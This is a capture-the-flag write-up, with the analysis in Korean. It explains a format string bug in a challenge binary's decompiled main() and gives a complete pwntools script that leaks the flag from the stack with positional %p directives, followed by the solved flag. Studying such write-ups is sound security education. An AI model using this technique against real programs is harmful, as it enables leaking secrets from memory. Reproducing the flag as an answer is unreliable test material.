# Description
Can you handle this top secret confidential case, fellow detective?
Author: omelette_keychain
# 분석
코드를 보자
/* Decompiled (IDA-style) listing of the challenge binary's main(); it is
 * decompiler output, not source meant to compile as-is. The annotations
 * mark the input-handling defects the rest of the writeup relies on. */
int __fastcall main(int argc, const char **argv, const char **envp)
{
    char v4; // [rsp+17h] [rbp-B9h] BYREF      -- the (Y/n) answer
    FILE *stream; // [rsp+18h] [rbp-B8h]
    char s[64]; // [rsp+20h] [rbp-B0h] BYREF    -- receives the flag text
    char format[104]; // [rsp+60h] [rbp-70h] BYREF -- receives the user's "name"
    unsigned __int64 v8; // [rsp+C8h] [rbp-8h]  -- stack-protector canary

    v8 = __readfsqword(0x28u); /* canary read from fs:0x28 */
    stream = fopen("flag.txt", "r");
    if ( !stream )
        printf("Error in opening the flag file"); /* no exit/return here: the fgets below still runs with a NULL stream */
    fgets(s, 63, stream); /* at most 62 bytes of the flag land in s, inside main's frame */
    puts("Welcome to the Armed Detective Agency - the best and most famous detective agency in all of Yokohama!");
    puts("Thank you for coming, future detective! We need your help on this very important and classified mission!");
    puts("A chest full of ability crystals has been lost somewhere in this binary.");
    puts("Can you help us find it? (Y/n)");
    __isoc99_scanf("%c", &v4); /* one character; anything other than 'n' takes the vulnerable path */
    if ( v4 == 'n' )
    {
        puts("Aww! We really looked forward to working with you! :(\n Have a nice day.");
    }
    else
    {
        puts("Great! What was your name again?");
        __isoc99_scanf("%s", format); /* no field width (e.g. "%103s"), so input longer than 103 bytes overruns format[] */
        printf("Looking forward to working with you ");
        printf(format); /* user-controlled format string: positional directives such as %N$p read main's
                         * frame, where s holds the flag. Safe form: printf("%s", format) or fputs(). */
    }
    return 0;
}
간단한 Format String Bug 취약점이다.
s에 flag의 내용을 넣고 printf를 호출하므로, 호출 시 인자(위치 지정자)만 잘 맞춰주면 flag를 유출할 수 있다.
# Payload
#!/usr/bin/env python3.12
'''
author: JangJongMin
time: 2025-07-25 21:37:37
'''
from pwn import *
# Target binary, the libc it was patched against, and the remote endpoint.
filename = "mission_patched"
libcname = "/home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 1337

# Registering the binary as context.binary lets pwntools pick arch/bits/endianness
# from the ELF; debugger windows are opened as new tmux windows.
context.binary = elf = ELF(filename)
context.terminal = "tmux neww".split()

# The libc object is only created when a path is configured.
if libcname:
    libc = ELF(libcname)

# gdb script used by start() when run with GDB=1: point gdb at the matching
# debug symbols and glibc sources, then break at a fixed offset from the PIE
# base (presumably near the format-string printf - confirm against the binary).
gs = '''
set debug-file-directory /home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/ubuntu/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
set $pie_base=$_base("mission_patched")
b *($pie_base + 0x131C)
c
'''
def start():
    """Launch the target as selected by pwntools' command-line args.

    GDB=1 runs it under gdb with the ``gs`` script, REMOTE=1 connects to
    ``host``:``port``, otherwise a local process is spawned.
    """
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    return process(elf.path)
def log(str_, hex_):
    """Emit a pwntools success line of the form ``<label> : 0x<value>``."""
    message = "{} : {}".format(str_, hex(hex_))
    success(message)
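def DEPTR(ptr):
    """Recover a glibc safe-linked pointer from its mangled value.

    glibc (>= 2.32) stores ``(pos >> 12) ^ ptr`` in tcache/fastbin ``next``
    fields. The top 12 bits of the stored value are unmasked, so the original
    pointer can be rebuilt one 12-bit chunk at a time from the top down, each
    chunk being XORed with the chunk recovered just before it. This assumes
    ``pos`` and ``ptr`` share their upper bits (chunks on the same heap), which
    is the usual case; it cannot be verified from the mangled value alone.

    Args:
        ptr: the mangled (non-negative) value read from the chunk.

    Returns:
        The demangled pointer; 0 for a mangled value of 0 (the original code
        raised IndexError on that input).

    Raises:
        ValueError: if ``ptr`` is negative (the original looped forever).
    """
    if ptr < 0:
        raise ValueError("ptr must be non-negative")
    chunks = []
    while ptr:
        chunks.append(ptr & 0xFFF)
        ptr >>= 12
    dec = 0
    prev = 0
    # Walk from the most significant chunk down; each plaintext chunk is the
    # previous plaintext chunk XOR the current mangled chunk.
    for chunk in reversed(chunks):
        prev ^= chunk
        dec = (dec << 12) | prev
    return dec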
def ENPTR(pos, ptr):
    """Mangle ``ptr`` as glibc safe-linking does when it is stored at address
    ``pos``: XOR with the storage address shifted right by 12 bits."""
    key = pos >> 12
    return ptr ^ key
p = start()

# Short aliases for the tube API.
s = p.send
sf = p.sendafter
sl = p.sendline
slf = p.sendlineafter
r = p.recv
ru = p.recvuntil
rl = p.recvline

# Answer the (Y/n) prompt with anything but 'n' so the program asks for a name.
slf("(Y/n)", "Y")

# Eight positional "%N$p" directives, N = 10..17: eight 8-byte stack slots,
# matching the 64-byte `s` buffer that holds the flag (see the listing above).
# The starting index was presumably fixed from the gdb breakpoint in `gs`.
# The payload must contain no whitespace, since scanf("%s") stops there.
payload = ""
for i in range(8):
    payload += "%{}$p".format(int(4+i)+6)
# 'EOF' is a trailing marker so the reply can be cut exactly below.
slf("?", payload+'EOF')

# Skip the fixed text printed before the user-controlled format string.
ru(b"you ")
# Read up to the marker, drop the marker itself, split on "0x", hex-decode
# each qword and reverse its bytes (little-endian -> memory order).
# NOTE(review): %p prints no leading zeros and "(nil)" for NULL, so a slot with
# an odd digit count or a NULL pointer makes bytes.fromhex() raise ValueError.
print(b''.join([bytes.fromhex(i.decode())[::-1] for i in ru("EOF")[:-3].split(b"0x") if i]))
p.interactive()
# Flag
ShaktiCTF{th3_eXtr@ct3d_@bilitie5_v@n1sh_but_th3_fl@g_r3m@1ns}